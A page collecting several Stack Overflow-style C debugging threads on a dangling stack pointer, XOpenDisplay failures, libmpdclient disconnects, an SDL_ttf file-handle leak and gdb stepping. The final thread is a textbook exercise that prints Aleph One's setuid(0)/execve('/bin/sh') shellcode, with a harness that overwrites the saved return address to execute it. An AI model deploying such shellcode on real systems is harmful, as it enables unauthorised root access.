Can't write to a file when running my code optimized - c

I have a program that writes data to a binary file, it works when I run it in Visual Studio 2013 in Debug mode (no optimization), but when I run it in Release mode, with Maximize Speed enabled, it doesn't work (the file becomes empty)...
Can you tell me why it might not work?
EDIT:
Dr. Memory log of running the application in Release mode, if you see something alarming, please tell me: http://pastebin.com/5s4Z51ZV
Which errors might cause the problem?
Also, should I work on fixing every single one of the errors? or are some of them "false positives"?
EDIT:
After debugging the optimized code via this guide: http://msdn.microsoft.com/en-us/library/vstudio/606cbtzs%28v=vs.100%29.aspx , I found something very weird was happening when I generate a huffman tree (from a priority queue of characters), this is my code:
HNode * generateHuffmanTree(Queue * queue) // generates a huffman tree from a queue of a file's characters.
{
HNode * root = (HNode *) calloc(1, sizeof(HNode));
root->left = dequeue(queue); // gets the two smallest-amount characters
root->right = dequeue(queue); // and puts them into left and right of the root.
root->character = '\0';
root->value = root->left->value + root->right->value;
if (isQueueEmpty(queue)) return root; // end condition, if it's the only thing left.
enqueue(queue, root); // puts the root back in the queue so it can be a part of the process in the next iteration
#ifdef debug
printQueue(queue);
#endif
generateHuffmanTree(queue); // runs the operation again, now with the new root in the queue.
}
I can see in the debugger that the problem is not in queue as it comes in as it should, but it seems to ignore my declaration of root, then when I try to do root->left it overwrites the data in queue. Anyone know why this might happen and how to find a work around or fix it? Or is it even not the problem?

I figured out what caused the problem. It had nothing to do with the file specifically, I had a function initMap that creates a struct: Map m, initializes it with initial values and returns &map to another function. I suspected this might be a problem because it will get popped out of the stack and then the pointer will be to nothing. But since it worked while I tested it (in Debug mode) I left it alone. But appearently it doesn't work. So what I did is Map * map = (Map *) calloc(1, sizeof(Map)); and it worked.
Thanks to mafso and Kalsai for helping me figure it out.

Related

Function XOpenDisplay with and without parameter

I have little issue with XOpenDisplay function. In school I can run program and it works good when using XOpenDisplay("ip:0"), but on my local machine in home when I run program (changed ip on current) got "Segmentation fault (core dumped)", but with empy string XOpenDisplay("") it works fine. I need to be able to use ip. Used host +, but nothing changes.
My system is Kubuntu 14.04.1: 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015
Here is code of program:
#include <X11/Xlib.h>
#include <X11/X.h>
#include <stdio.h>
Display *mydisplay;
Window mywindow;
XSetWindowAttributes mywindowattributes;
XGCValues mygcvalues;
GC mygc;
Visual *myvisual;
int mydepth;
int myscreen;
Colormap mycolormap;
XColor mycolor,mycolor1,dummy;
int i;
main()
{
mydisplay = XOpenDisplay("192.168.0.12:0");
myscreen = DefaultScreen(mydisplay);
myvisual = DefaultVisual(mydisplay,myscreen);
mydepth = DefaultDepth(mydisplay,myscreen);
mywindowattributes.background_pixel = XWhitePixel(mydisplay,myscreen);
mywindowattributes.override_redirect = True;
mywindow = XCreateWindow(mydisplay,XRootWindow(mydisplay,myscreen),
0,0,500,500,10,mydepth,InputOutput,
myvisual,CWBackPixel|CWOverrideRedirect,
&mywindowattributes);
mycolormap = DefaultColormap(mydisplay,myscreen);
XAllocNamedColor(mydisplay,mycolormap,"cyan",&mycolor,&dummy);
XAllocNamedColor(mydisplay,mycolormap,"red",&mycolor1,&dummy);
XMapWindow(mydisplay,mywindow);
mygc = DefaultGC(mydisplay,myscreen);
XSetForeground(mydisplay,mygc,mycolor.pixel);
XFillRectangle(mydisplay,mywindow,mygc,100,100,300,300);
XSetForeground(mydisplay,mygc,mycolor1.pixel);
XSetFunction(mydisplay,mygc,GXcopy);
XSetLineAttributes(mydisplay,mygc,10,LineSolid,CapProjecting,JoinMiter);
XDrawLine(mydisplay,mywindow,mygc,100,100,400,400);
XDrawLine(mydisplay,mywindow,mygc,100,400,400,100);
XFlush(mydisplay);
sleep(10);
XCloseDisplay(mydisplay);
exit(0);
}
I can only guess that need to set something, but have no idea where is that option.
You shall always check whether functions returned successfully, or not. It is not a Haskell, where all the checking done for you by monad, it is C. As for your particular case, the problem is that the function XOpenDisplay fails and returns null for you. In the next line you're trying to use DefaultScreen with the result. The DefaultScreen is defined as
#define DefaultScreen(dpy) ((dpy)->default_screen)
I.e. it just a macro, which using the first argument as a pointer. In your case it does ((0)->default_screen), i.e. it dereferencing the null pointer, and that leads to the segfault you see.
Also, about the XOpenDisplay("192.168.0.12:0"); — you didn't mentioned that you're trying to connect to another PC, so, if it's the same computer where the app running, try to call the function as XOpenDisplay("127.0.0.1:0");
UPD: okay, I tried to run the code at my PC, and the function doesn't work for me too. To find the reason I started the code under strace app, and saw
…
connect(3, {sa_family=AF_INET, sin_port=htons(6000), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 ECONNREFUSED (Connection refused)
…
Aha! So, the app trying to connect to XServer, but Xserver refuses the connection. Actually, it have a security reason to disable it by default — so, that nobody would connect to your XServer from a network unless you specifically allowed it. For the function to work you need to launch your XServer with the option that allows such a connection. Right now DisplayManagers are the ones, who manages xsessions, so you need to set some option depending on your DM.
The solution for lightdm
Open the /etc/lightdm/lightdm.conf, and paste the line xserver-allow-tcp=true in the section [SeatDefaults](you will see it).
The solution for gdm
Edit the file /etc/gdm/gdm.schemas, you will find there something like
<schema>
<key>security/DisallowTCP</key>
<signature>b</signature>
<default>true</default>
</schema>
Change the true to false.

libmpdclient: detect lost connection to MPD daemon

I'm writing a plugin for my statusbar to print MPD state, currently using the libmpdclient library. It has to be robust to properly handle lost connections in case MPD is restarted, but simple checking with mpd_connection_get_error on existing mpd_connection object does not work – it can detect the error only when the initial mpd_connection_new fails.
This is a simplified code I'm working with:
#include <stdio.h>
#include <unistd.h>
#include <mpd/client.h>
int main(void) {
struct mpd_connection* m_connection = NULL;
struct mpd_status* m_status = NULL;
char* m_state_str;
m_connection = mpd_connection_new(NULL, 0, 30000);
while (1) {
// this check works only on start up (i.e. when mpd_connection_new failed),
// not when the connection is lost later
if (mpd_connection_get_error(m_connection) != MPD_ERROR_SUCCESS) {
fprintf(stderr, "Could not connect to MPD: %s\n", mpd_connection_get_error_message(m_connection));
mpd_connection_free(m_connection);
m_connection = NULL;
}
m_status = mpd_run_status(m_connection);
if (mpd_status_get_state(m_status) == MPD_STATE_PLAY) {
m_state_str = "playing";
} else if (mpd_status_get_state(m_status) == MPD_STATE_STOP) {
m_state_str = "stopped";
} else if (mpd_status_get_state(m_status) == MPD_STATE_PAUSE) {
m_state_str = "paused";
} else {
m_state_str = "unknown";
}
printf("MPD state: %s\n", m_state_str);
sleep(1);
}
}
When MPD is stopped during the execution of the above program, it segfaults with:
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x00007fb2fd9557e0 in mpd_status_get_state () from /usr/lib/libmpdclient.so.2
The only way I can think of to make the program safe is to establish a new connection in every iteration, which I was hoping to avoid. But then what if the connection is lost between individual calls to libmpdclient functions? How often, and more importantly how exactly, should I check if the connection is still alive?
The only way I could find that really works (beyond reestablishing a connection with each run) is using the idle command. If mpd_recv_idle (or mpd_run_idle) returns 0, it is an error condition, and you can take that as a cue to free your connection and run from there.
It's not a perfect solution, but it does let you keep a live connection between runs, and it helps you avoid segfaults (though I don't think you can completely avoid them, because if you send a command and mpd is killed before you recv it, I'm pretty sure the library still segfaults). I'm not sure if there is a better solution. It would be fantastic if there was a reliable way to detect if your connection was still alive via the API, but I can't find anything of the sort. It doesn't seem like libmpdclient is well-built for very long-lived connections that have to deal with mpd instances that go up and down over time.
Another lower-level option is to use sockets to interact with MPD through its protocol directly, though in doing that you'd likely reimplement much of libmpdclient itself anyway.
EDIT: Unfortunately, the idle command does block until something happens, and can sit blocking for as long as a single audio track will last, so if you need your program to do other things in the interim, you have to find a way to implement it asynchronously or in another thread.
Assuming "conn" is a connection created with "mpd_connection_new":
if (mpd_connection_get_error(conn) == MPD_ERROR_CLOSED) {
// mpd_connection_get_error_message(conn)
// will return "Connection closed by the server"
}
You can run this check after almost any libmpdclient call, including "mpd_recv_idle" or (as per your example) "mpd_run_status".
I'm using libmpdclient 2.18, and this certainly works for me.

TTF_OpenFont fails on Nth attempt

I'm trying to make a game in C using SDL_ttf to display the score every time the diplay is refreshed. The code looks like :
SDL_Surface *score = NULL;
TTF_Font *font;
SDL_Color color = { 255, 255, 255 };
font = TTF_OpenFont( "/home/sophie/Bureau/snake/data/ubuntu.ttf", 28 );
if (font == NULL) {
printf("%s\n", TTF_GetError());
}
score = TTF_RenderText_Solid( font, "score to display", color );
SDL_BlitSurface( score, NULL, screen, NULL );
SDL_Flip(screen);
When I launch the game, everything works properly, but after a while the game crashes and I get the following error :
Couldn't open /home/sophie/Bureau/snake/data/ubuntu.ttf
libgcc_s.so.1 must be installed for pthread_cancel to work
Abandon (core dumped)
I tried different fonts but I still have this problem.
Then I used a counter in the main loop of the game and found that the game always crashes after the 1008th time, regardless of the speed I wanted it to work at (in snake everything goes faster when you score points).
I don't know where does the problem comes from, nor what exactly does the error message mean.
Please tell me if you have any ideas, or if my question is poorly formulated. I looked on several forums and found nothing corresponding to my case, I could use any help now !
Thanks in advance
It looks like you're repeatedly opening the font every time you go through this function:
font = TTF_OpenFont( "/home/sophie/Bureau/snake/data/ubuntu.ttf", 28 );
While it may not be in the main game loop as Jongware suspected, you mentioned that after 1008 executions through this code path, the code crashes.
What is happening is that some resource is being leaked. Either the resource needs to be released by calling TTF_CloseFont() or (more efficient) hold onto the handle after the first time you open it and re-use it each time. Use a static declaration for the font and initialize to NULL:
static TTF_Font *font = NULL;
Then, if it hasn't been opened yet, open it:
if (!font) {
font = TTF_OpenFont( "/home/sophie/Bureau/snake/data/ubuntu.ttf", 28 );
}
This will initialize font the first time while subsequent iterations over the code will not unnecessarily re-do the process and leak the resource.
You mentioned that the code crashes after 1008 times through this function. That's pretty close to 1024. As memory serves, Linux has a limit of 1024 file handles per process (this is probably tunable in the kernel but I have run into this limitation in debugging resource leaks before). There are probably 16 other file handles open by your process and then 1 process being leaked by each invocation of TTF_OpenFont. Once you go above 1024, boom.
You can check the number of open file handles of a particular process (<pid>) by inspecting the number of file descriptors in /proc/<pid>/fd/.

Call to malloc failing in gdb session

I am trying to debug a C program and gdb is telling me there is a segfault on line 329 of a certain function. So I set a break point for that function and I am trying to step through it. However, whenever I hit line 68 I get this complaint from gdb:
(gdb) step
68 next_bb = (basic_block *)malloc(sizeof(basic_block));
(gdb) step
*__GI___libc_malloc (bytes=40) at malloc.c:3621
3621 malloc.c: No such file or directory.
in malloc.c
I don't know what this means. The program runs perfectly on all but one set of inputs so this call to malloc clearly succeeds during other executions of the program. And, of course, I have:
#include <stdlib.h>.
Here is the source code:
// Block currently being built.
basic_block *next_bb = NULL;
// Traverse the list of instructions in the procedure.
while (curr_instr != NULL)
{
simple_op opcode = curr_instr->opcode;
// If we are not currently building a basic_block then we must start a new one.
// A new block can be started with any kind of instruction.
if (!in_block)
{
// Create a new basic_block.
next_bb = (basic_block *)malloc(sizeof(basic_block));
You can safely ignore this. gdb is complaining that it doesn't have the source for malloc - and it's almost certain you don't want to step through the source.
Two easy solutions:
Use next instead of step - it won't descend into functions
If you've accidentally steped into a function already, use finish to run to the return statement of the function.
And an alternative approach:
You could also break a bit before the segfault, rather than stepping through the whole code.
You can do this by putting a breakpoint on a particular line with break <source file>:<line num> (for example break foo.c:320 to break on line 320 of foo.c).
Or you can break on a particular function with break <function name> (for example break foo will break at the top of the foo() function).

I have this code .... Ethical Hacking

I am following this EBook about Ethical Hacking, and I reached the Linux Exploit Chapter, this is the code with Aleph's 1 code.
//shellcode.c
char shellcode[] = //setuid(0) & Aleph1's famous shellcode, see ref.
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main() { //main function
int *ret; //ret pointer for manipulating saved return.
ret = (int *)&ret + 2; //setret to point to the saved return
//value on the stack.
(*ret) = (int)shellcode; //change the saved return value to the
//address of the shellcode, so it executes.
}
I give this the super user privileges, with
chmod u+s shellcode
as a super user, then go back to normal user with
su - normal_user
but when I run ./shellcode I should be a root user but instead I still be normal_user
so any help??
btw I am working on BT4-Final, I turned off the ASLR, and running BT4 in VMWare...
If this is an old exploit... Shouldn't it have been already fixed long ago?
By the way, as a personal advice: don't be so lame to use that nickname and then go around asking about exploits.
Is the shellcode executable owned by root? The setuid bit (u+s) makes the executable run with the privileges of its owner, which is not necessarily root.
Well, setuid() changes the user for the currently running program. Your Shell will still be running under your normal user! :)
Either that, or I don't get this hack's purpose.
I think setuid only sets the uid to 0 while the program is running. Can you perform some operation to check the UID while the shellcode is running?
If I get it right, the code you are executing (setuid(0)) is a System Call that changes the current user to the root. The catch is that it's changing the current user id over that process, giving that process root authority. If it is working you could run anything with root privileges.
To test it, create a file or directory with the root, make sure you can't remove it as a simple user, and then try adding code to your executable that removes the file. If the code is working, the file should be deleted.
Then, to gain root powers, try to fork to a new shell from within your program. I'm not sure if it's possible, though.
...however, this is an old exploit. Old kernels might be open to this, but using any recent release will do nothing at all.
UPDATE: I've just re-read the code and realized the call to the shell is there (/bin/sh), so you are already forking to a supposed super-user shell. To check if it's actually working, see the PID of your shell before and after the call. If it has changed, exit the shell, you should return to the previous PID. That means (1) it worked, you manipulated the stack and executed that code there, and (2) the exploit is fixed and the Kernel is preventing you from gaining access.

Resources